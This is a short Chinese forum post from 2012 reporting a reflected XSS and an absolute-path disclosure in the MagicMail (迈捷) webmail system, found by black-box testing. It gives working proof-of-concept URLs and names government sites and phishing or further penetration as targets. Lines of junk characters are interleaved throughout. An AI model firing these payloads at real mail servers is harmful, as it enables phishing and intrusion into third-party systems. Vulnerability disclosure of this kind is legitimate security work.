今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
! V% s2 O P% T' S* p" |7 Y1 n
3 U% v+ c: J6 e! L$ B0 c # P! f# Q! x7 J i+ e1 x! ?1 F
包含 一个反射性XSS 以及 绝对路径泄漏
) d6 B, A7 A J看了看 貌似全部是linux的。2 U9 o" u" e7 l; N8 c
0 o. _6 l% E% J! H" e
关键字:迈捷邮件系统 by MagicMail
+ d: Q+ w6 S$ ^, L! ~' q7 V" @% r o0 U( x/ G) I1 H) C: n
可以看到很多政府网站都用这个邮件系统
3 p1 X x0 K4 H! _9 u/ I6 [8 A# f
绝对路径 http://madman.in/index.php?login_type=declare&language=
. S% s L, Q: u- J4 m
5 D( T8 J) W; B. b. `! z) v4 ?5 K# U/ [, [- ?/ F( {3 R
' i0 N4 O0 I f" \9 s4 H+ o9 fXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
6 u( y. e) P9 W) X" }
- F" O4 l5 e6 V. f- [$ _( E
) |' S8 R+ V1 K4 x6 \+ p e" _& O5 G" v
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
1 _$ g, |' k% v. q& L1 N* \& ]
$ o% y5 x5 U- K! A/ S9 M修复方案:看官方补丁吧。
; p( v7 v5 A6 @; E2 w |
发表于 2012-11-9 20:38:41
收藏
支持
反对